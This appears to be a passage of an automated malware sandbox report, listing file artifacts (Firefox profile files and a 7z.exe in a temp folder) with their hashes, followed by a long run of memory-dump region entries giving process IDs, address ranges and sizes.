                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\sessionstore-backups\recovery.jsonlz4

                        Filesize

                        931B

                        MD5

                        d2ab45533c0e28fffd25f15eeb0dedb2

                        SHA1

                        b7765a521d85b14b627b1e252bf0806606722f6f

                        SHA256

                        a78601e4cb061ea67ef894b7cbef11f7c1970023d1b2cee5a734e984ba8213c0

                        SHA512

                        e081be838a201bbd87a55873a2e91e3268eaf0b707081f1053bcdc7f088a058564ba91d5bb06e83f871e39bf66ccde8f45b1009b2b4c9a6d6abd688f374abf3f

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

                        Filesize

                        184KB

                        MD5

                        76fdfeee466c4ba1ba999313fdb60979

                        SHA1

                        537dc6e028bfdec37c50351d03d04905f0f1c666

                        SHA256

                        df4f74a752204b80cccab8e59165a609d3772c2833d1d1600978b2ae04e0fcfd

                        SHA512

                        4c5f289fd73b4dd3eab77066b744f727e2a4fc52c371351afc8059bacdb40bccaa717fa3671ad590309e5b16a8b3678078824da2a139f0ec988c0053ad92fab2

                      • \Users\Admin\AppData\Local\Temp\main\7z.exe

                        Filesize

                        458KB

                        MD5

                        619f7135621b50fd1900ff24aade1524

                        SHA1

                        6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                        SHA256

                        344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                        SHA512

                        2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                      • memory/584-2410-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

                        Filesize

                        32KB

                      • memory/584-2407-0x000000001B6A0000-0x000000001B982000-memory.dmp

                        Filesize

                        2.9MB

                      • memory/756-78-0x0000000000820000-0x0000000000CCB000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/756-156-0x0000000000820000-0x0000000000CCB000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/756-152-0x0000000000820000-0x0000000000CCB000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/1664-2387-0x000000013F350000-0x000000013F7E0000-memory.dmp

                        Filesize

                        4.6MB

                      • memory/1664-2424-0x000000013F350000-0x000000013F7E0000-memory.dmp

                        Filesize

                        4.6MB

                      • memory/1664-2391-0x000000013F350000-0x000000013F7E0000-memory.dmp

                        Filesize

                        4.6MB

                      • memory/1664-2428-0x000000013F350000-0x000000013F7E0000-memory.dmp

                        Filesize

                        4.6MB

                      • memory/1740-209-0x0000000000A00000-0x0000000000A0C000-memory.dmp

                        Filesize

                        48KB

                      • memory/2072-158-0x00000000008B0000-0x0000000000D56000-memory.dmp

                        Filesize

                        4.6MB

                      • memory/2072-154-0x00000000008B0000-0x0000000000D56000-memory.dmp

                        Filesize

                        4.6MB

                      • memory/2492-97-0x0000000000060000-0x0000000000176000-memory.dmp

                        Filesize

                        1.1MB

                      • memory/2492-98-0x0000000001EF0000-0x0000000001F16000-memory.dmp

                        Filesize

                        152KB

                      • memory/2492-210-0x0000000004890000-0x0000000004952000-memory.dmp

                        Filesize

                        776KB

                      • memory/2656-2390-0x000000013F350000-0x000000013F7E0000-memory.dmp

                        Filesize

                        4.6MB

                      • memory/2656-2427-0x000000013F350000-0x000000013F7E0000-memory.dmp

                        Filesize

                        4.6MB

                      • memory/2684-47-0x0000000000400000-0x0000000000456000-memory.dmp

                        Filesize

                        344KB

                      • memory/2684-49-0x0000000000400000-0x0000000000456000-memory.dmp

                        Filesize

                        344KB

                      • memory/2684-45-0x0000000000400000-0x0000000000456000-memory.dmp

                        Filesize

                        344KB

                      • memory/2684-57-0x0000000000400000-0x0000000000456000-memory.dmp

                        Filesize

                        344KB

                      • memory/2684-46-0x0000000000400000-0x0000000000456000-memory.dmp

                        Filesize

                        344KB

                      • memory/2684-55-0x0000000000400000-0x0000000000456000-memory.dmp

                        Filesize

                        344KB

                      • memory/2684-52-0x0000000000400000-0x0000000000456000-memory.dmp

                        Filesize

                        344KB

                      • memory/2684-50-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                        Filesize

                        4KB

                      • memory/2684-48-0x0000000000400000-0x0000000000456000-memory.dmp

                        Filesize

                        344KB

                      • memory/2740-189-0x0000000000100000-0x00000000005D0000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2740-181-0x0000000004C20000-0x0000000005020000-memory.dmp

                        Filesize

                        4.0MB

                      • memory/2740-182-0x0000000076D60000-0x0000000076F09000-memory.dmp

                        Filesize

                        1.7MB

                      • memory/2740-184-0x0000000076200000-0x0000000076247000-memory.dmp

                        Filesize

                        284KB

                      • memory/2740-180-0x0000000004C20000-0x0000000005020000-memory.dmp

                        Filesize

                        4.0MB

                      • memory/2740-178-0x0000000000100000-0x00000000005D0000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2744-151-0x0000000006800000-0x0000000006CAB000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/2744-77-0x0000000006800000-0x0000000006CAB000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/2744-17-0x0000000000921000-0x000000000094F000-memory.dmp

                        Filesize

                        184KB

                      • memory/2744-18-0x0000000000920000-0x0000000000C43000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2744-21-0x0000000000920000-0x0000000000C43000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2744-2429-0x0000000006800000-0x0000000007354000-memory.dmp

                        Filesize

                        11.3MB

                      • memory/2744-20-0x0000000000920000-0x0000000000C43000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2744-22-0x0000000000920000-0x0000000000C43000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2744-40-0x0000000000920000-0x0000000000C43000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2744-44-0x0000000000920000-0x0000000000C43000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2744-58-0x0000000000920000-0x0000000000C43000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2744-56-0x0000000000920000-0x0000000000C43000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2744-59-0x0000000000920000-0x0000000000C43000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2744-218-0x0000000006800000-0x0000000006CD0000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2744-76-0x0000000006800000-0x0000000006CAB000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/2744-194-0x0000000000920000-0x0000000000C43000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2744-133-0x0000000000920000-0x0000000000C43000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2744-150-0x0000000006800000-0x0000000006CAB000-memory.dmp

                        Filesize

                        4.7MB

                      • memory/2744-153-0x0000000006800000-0x0000000006CA6000-memory.dmp

                        Filesize

                        4.6MB

                      • memory/2744-155-0x0000000006800000-0x0000000006CA6000-memory.dmp

                        Filesize

                        4.6MB

                      • memory/2744-177-0x0000000006800000-0x0000000006CA6000-memory.dmp

                        Filesize

                        4.6MB

                      • memory/2744-175-0x0000000006800000-0x0000000006CD0000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2744-174-0x0000000006800000-0x0000000006CD0000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2744-2408-0x0000000006800000-0x0000000007354000-memory.dmp

                        Filesize

                        11.3MB

                      • memory/2744-179-0x0000000006800000-0x0000000006CA6000-memory.dmp

                        Filesize

                        4.6MB

                      • memory/2744-16-0x0000000000920000-0x0000000000C43000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/2908-193-0x0000000076200000-0x0000000076247000-memory.dmp

                        Filesize

                        284KB

                      • memory/2908-186-0x0000000000080000-0x000000000008A000-memory.dmp

                        Filesize

                        40KB

                      • memory/2908-191-0x0000000076D60000-0x0000000076F09000-memory.dmp

                        Filesize

                        1.7MB

                      • memory/2908-190-0x00000000008B0000-0x0000000000CB0000-memory.dmp

                        Filesize

                        4.0MB

                      • memory/2992-279-0x0000000000B70000-0x0000000000C01000-memory.dmp

                        Filesize

                        580KB

                      • memory/2992-240-0x0000000000400000-0x0000000000464000-memory.dmp

                        Filesize

                        400KB

                      • memory/2992-259-0x0000000000B70000-0x0000000000C01000-memory.dmp

                        Filesize

                        580KB

                      • memory/2992-235-0x0000000000400000-0x0000000000464000-memory.dmp

                        Filesize

                        400KB

                      • memory/2992-238-0x0000000000400000-0x0000000000464000-memory.dmp

                        Filesize

                        400KB

                      • memory/2992-236-0x0000000000400000-0x0000000000464000-memory.dmp

                        Filesize

                        400KB

                      • memory/2992-265-0x0000000000B70000-0x0000000000C01000-memory.dmp

                        Filesize

                        580KB

                      • memory/2992-263-0x0000000000B70000-0x0000000000C01000-memory.dmp

                        Filesize

                        580KB

                      • memory/2992-245-0x0000000000400000-0x0000000000464000-memory.dmp

                        Filesize

                        400KB

                      • memory/2992-261-0x0000000000B70000-0x0000000000C01000-memory.dmp

                        Filesize

                        580KB

                      • memory/2992-247-0x0000000000400000-0x0000000000464000-memory.dmp

                        Filesize

                        400KB

                      • memory/2992-243-0x0000000000400000-0x0000000000464000-memory.dmp

                        Filesize

                        400KB

                      • memory/2992-242-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

                        Filesize

                        4KB

                      • memory/2992-277-0x0000000000B70000-0x0000000000C01000-memory.dmp

                        Filesize

                        580KB

                      • memory/2992-249-0x0000000000B70000-0x0000000000C08000-memory.dmp

                        Filesize

                        608KB

                      • memory/2992-257-0x0000000000B70000-0x0000000000C01000-memory.dmp

                        Filesize

                        580KB

                      • memory/2992-255-0x0000000000B70000-0x0000000000C01000-memory.dmp

                        Filesize

                        580KB

                      • memory/2992-254-0x0000000000B70000-0x0000000000C01000-memory.dmp

                        Filesize

                        580KB

                      • memory/2992-269-0x0000000000B70000-0x0000000000C01000-memory.dmp

                        Filesize

                        580KB

                      • memory/2992-271-0x0000000000B70000-0x0000000000C01000-memory.dmp

                        Filesize

                        580KB

                      • memory/2992-273-0x0000000000B70000-0x0000000000C01000-memory.dmp

                        Filesize

                        580KB

                      • memory/2992-267-0x0000000000B70000-0x0000000000C01000-memory.dmp

                        Filesize

                        580KB

                      • memory/2992-275-0x0000000000B70000-0x0000000000C01000-memory.dmp

                        Filesize

                        580KB

                      • memory/2992-2320-0x0000000000C60000-0x0000000000CAC000-memory.dmp

                        Filesize

                        304KB

                      • memory/2992-2319-0x0000000000980000-0x00000000009AC000-memory.dmp

                        Filesize

                        176KB

                      • memory/3000-5-0x0000000001070000-0x0000000001393000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/3000-15-0x0000000001070000-0x0000000001393000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/3000-3-0x0000000001070000-0x0000000001393000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/3000-0-0x0000000001070000-0x0000000001393000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/3000-1-0x0000000076F50000-0x0000000076F52000-memory.dmp

                        Filesize

                        8KB

                      • memory/3000-2-0x0000000001071000-0x000000000109F000-memory.dmp

                        Filesize

                        184KB

                      • memory/3088-2686-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

                        Filesize

                        32KB

                      • memory/3088-2685-0x000000001B540000-0x000000001B822000-memory.dmp

                        Filesize

                        2.9MB

                      • memory/3212-2457-0x0000000000AB0000-0x0000000001604000-memory.dmp

                        Filesize

                        11.3MB

                      • memory/3212-2409-0x0000000000AB0000-0x0000000001604000-memory.dmp

                        Filesize

                        11.3MB

                      • memory/3432-2711-0x0000000000050000-0x0000000000306000-memory.dmp

                        Filesize

                        2.7MB

                      • memory/3432-2712-0x0000000000050000-0x0000000000306000-memory.dmp

                        Filesize

                        2.7MB

                      • memory/5308-2669-0x00000000022D0000-0x00000000022F2000-memory.dmp

                        Filesize

                        136KB

                      • memory/5308-2668-0x00000000056B0000-0x0000000005806000-memory.dmp

                        Filesize

                        1.3MB

                      • memory/5308-2482-0x00000000001A0000-0x00000000004C8000-memory.dmp

                        Filesize

                        3.2MB

                      • memory/5544-2495-0x0000000000D50000-0x0000000000D5C000-memory.dmp

                        Filesize

                        48KB
